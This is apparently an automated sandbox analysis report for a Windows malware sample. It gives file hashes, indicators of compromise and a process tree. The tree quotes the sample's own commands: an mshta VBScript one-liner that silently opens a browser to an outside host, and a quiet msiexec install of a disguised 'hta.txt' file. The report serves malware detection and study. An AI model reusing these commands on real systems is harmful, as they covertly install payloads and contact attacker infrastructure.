Analysis
max time kernel: 229s
max time network: 309s
platform: windows7_x64
resource: win7-20221111-en
resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
submitted: 03/12/2022, 08:04
Static task: static1
Behavioral task: behavioral1
  Sample: 61a02c847c7bfe7f53eb024940ac75e683fd1c5a4d236109df2b9435761f1024.exe
  Resource: win7-20221111-en
Behavioral task: behavioral2
  Sample: 61a02c847c7bfe7f53eb024940ac75e683fd1c5a4d236109df2b9435761f1024.exe
  Resource: win10v2004-20220812-en
General
Target: 61a02c847c7bfe7f53eb024940ac75e683fd1c5a4d236109df2b9435761f1024.exe
Size: 1.1MB
MD5: 9e6fc523b4b7af53bb7bbb8e39441070
SHA1: 3f461debf3faade8bcf6f9e728f45d0a30efa6a0
SHA256: 61a02c847c7bfe7f53eb024940ac75e683fd1c5a4d236109df2b9435761f1024
SHA512: 64f0f79762d5b88683d9ba9ed64c9ed0fb03b2ed9483ae6b6531dc87a6ba3688bd5c40256fecef3a8f6c6b4347c37b4f45f2821af24d9b2377f6a6445ba62cba
SSDEEP: 24576:mVgdHVN5qTBqr4ETRudnITVllNv0cXruPS:mVSVNmBqrVTRuZWl1bwS
Malware Config
Signatures
Loads dropped DLL 2 IoCs
pid Process
316 MsiExec.exe
316 MsiExec.exe
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process
File opened (read-only) by msiexec.exe, one IoC per drive root, in the order recorded: \??\W:, \??\X:, \??\V:, \??\B:, \??\E:, \??\F:, \??\L:, \??\M:, \??\R:, \??\S:, \??\A:, \??\U:, \??\Y:, \??\T:, \??\K:, \??\N:, \??\Q:, \??\Z:, \??\J:, \??\H:, \??\I:, \??\O:, \??\P:, \??\G:
Drops file in Windows directory 6 IoCs
description ioc Process
File created C:\Windows\Installer\6efe1e.msi msiexec.exe
File opened for modification C:\Windows\Installer\6efe1e.msi msiexec.exe
File opened for modification C:\Windows\Installer\MSIFF18.tmp msiexec.exe
File opened for modification C:\Windows\Installer\MSI10C.tmp msiexec.exe
File created C:\Windows\Installer\6efe20.ipi msiexec.exe
File opened for modification C:\Windows\Installer\ msiexec.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Modifies Internet Explorer settings 24 IoCs
description ioc Process
All keys below are relative to \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer
Key created \LowRegistry\DOMStorage iexplore.exe
Key created \Main mshta.exe
Set value (str) \Main\WindowsSearch\Version = "WS not running" iexplore.exe
Set value (str) \Main\FullScreen = "no" iexplore.exe
Key created \Main IEXPLORE.EXE
Set value (int) \Recovery\PendingRecovery\AdminActive = "0" iexplore.exe
Key created \BrowserEmulation\LowMic iexplore.exe
Key created \IETld\LowMic iexplore.exe
Key created \LowRegistry iexplore.exe
Key created \Toolbar\WebBrowser iexplore.exe
Set value (int) \Recovery\AdminActive\{F779B071-7545-11ED-A15A-6A950B37D0A0} = "0" iexplore.exe
Key created \GPU iexplore.exe
Key created \PageSetup iexplore.exe
Set value (data) \Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe
Key created \Zoom iexplore.exe
Set value (int) \Main\CompatibilityFlags = "0" iexplore.exe
Key created \Recovery\AdminActive iexplore.exe
Key created \Main iexplore.exe
Key created \IntelliForms iexplore.exe
Key created \InternetRegistry iexplore.exe
Key created \LowRegistry\DontShowMeThisDialogAgain iexplore.exe
Key created \Toolbar iexplore.exe
Key created \Main\WindowsSearch iexplore.exe
Key created \Recovery\PendingRecovery iexplore.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process
904 msiexec.exe
904 msiexec.exe
Suspicious use of AdjustPrivilegeToken 40 IoCs
description pid Process
Token privileges adjusted by PID 1804 msiexec.exe (31 IoCs, in recorded order): SeShutdownPrivilege, SeIncreaseQuotaPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Token privileges adjusted by PID 904 msiexec.exe (9 IoCs): SeRestorePrivilege and SeTakeOwnershipPrivilege (each recorded 4 times), SeSecurityPrivilege (once)
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process
1280 iexplore.exe
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process
1280 iexplore.exe
1280 iexplore.exe
1908 IEXPLORE.EXE
1908 IEXPLORE.EXE
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target (identical rows collapsed, repeat count in parentheses)
PID 596 wrote to memory of 1496 | 596 61a02c847c7bfe7f53eb024940ac75e683fd1c5a4d236109df2b9435761f1024.exe | 27 (x4)
PID 1496 wrote to memory of 1264 | 1496 cmd.exe | 29 (x4)
PID 1264 wrote to memory of 1280 | 1264 mshta.exe | 30 (x4)
PID 1280 wrote to memory of 1908 | 1280 iexplore.exe | 32 (x4)
PID 1496 wrote to memory of 1804 | 1496 cmd.exe | 33 (x7)
PID 904 wrote to memory of 316 | 904 msiexec.exe | 35 (x7)
Processes
1. C:\Users\Admin\AppData\Local\Temp\61a02c847c7bfe7f53eb024940ac75e683fd1c5a4d236109df2b9435761f1024.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\61a02c847c7bfe7f53eb024940ac75e683fd1c5a4d236109df2b9435761f1024.exe"
   PID: 596
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c C:\Users\Admin\AppData\Local\Temp\~8769.bat "C:\Users\Admin\AppData\Local\Temp\61a02c847c7bfe7f53eb024940ac75e683fd1c5a4d236109df2b9435761f1024.exe"
      PID: 1496
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\SysWOW64\mshta.exe
         Command line: mshta vbscript:createobject("wscript.shell").run("""iexplore""http://cnzz.sjt8.com/info.access/?stat_it",0)(window.close)
         PID: 1264
         - Modifies Internet Explorer settings
         - Suspicious use of WriteProcessMemory
         4. C:\Program Files\Internet Explorer\iexplore.exe
            Command line: "C:\Program Files\Internet Explorer\iexplore.exe" http://cnzz.sjt8.com/info.access/?stat_it
            PID: 1280
            - Modifies Internet Explorer settings
            - Suspicious use of FindShellTrayWindow
            - Suspicious use of SetWindowsHookEx
            - Suspicious use of WriteProcessMemory
            5. C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
               Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1280 CREDAT:275457 /prefetch:2
               PID: 1908
               - Modifies Internet Explorer settings
               - Suspicious use of SetWindowsHookEx
      3. C:\Windows\SysWOW64\msiexec.exe
         Command line: msiexec.exe /i "C:\Users\Admin\AppData\Local\hta.txt" /quiet
         PID: 1804
         - Suspicious use of AdjustPrivilegeToken
1. C:\Windows\system32\msiexec.exe
   Command line: C:\Windows\system32\msiexec.exe /V
   PID: 904
   - Enumerates connected drives
   - Drops file in Windows directory
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\syswow64\MsiExec.exe
      Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 327DB6C15EB74EA8D976CEE92724FCDF
      PID: 316
      - Loads dropped DLL
Network
MITRE ATT&CK Enterprise v6
Downloads
Filesize: 1KB
MD5: 55e6b633560859a79fd6ab59c989aa4a
SHA1: b949ead8ee10d1ec202f0574a892d15f3a772ca9
SHA256: 4da99471f0c9dd4779eeac2bb1dc232a036d9502226b091e1cc30816179d8f02
SHA512: a13fca308a9fc826f535783f35a3c5eaf6a14446a9ab5c650f1aaae6c63b1e8ad316640d933b563d06ee3810280b38e0de3eca46ae2be785710057cf1f7c1a8e

Filesize: 240KB
MD5: 3fb2866481cf0d5bf34222343ef9834f
SHA1: 3699c4d5821d347a82283b000c5e8e6cb5d23473
SHA256: f2dfda3c25046a5fa249df5efd5646ed01f4b4d3fbe7b4f939b158306d9956db
SHA512: 71d4c040b8b9ed9a41aa11693fd1f1fa5cdef05bcb3f75c2a58d76816df1b0aef794019bc10ec107b4b6b260976ebda99357da3ebc441938d3c3a7a20ad1dc7c

Filesize: 48KB
MD5: 9067aad412defc0d2888479609041392
SHA1: 36cfffc3bafeb24f88ad5886ca5787ca008b6ba9
SHA256: 99f4e00b6908057a2fe5067ff6c8b6e32b5c07558ab79139dc4b998f1da4b517
SHA512: e69f259d78b02e6c1a5d9c45898b59372329a5288fff655dd741353f112b2b8eed18b01caa2bf312a91f5e314e1c0b036321b37c8efbebdcf3650ba6b12dee6a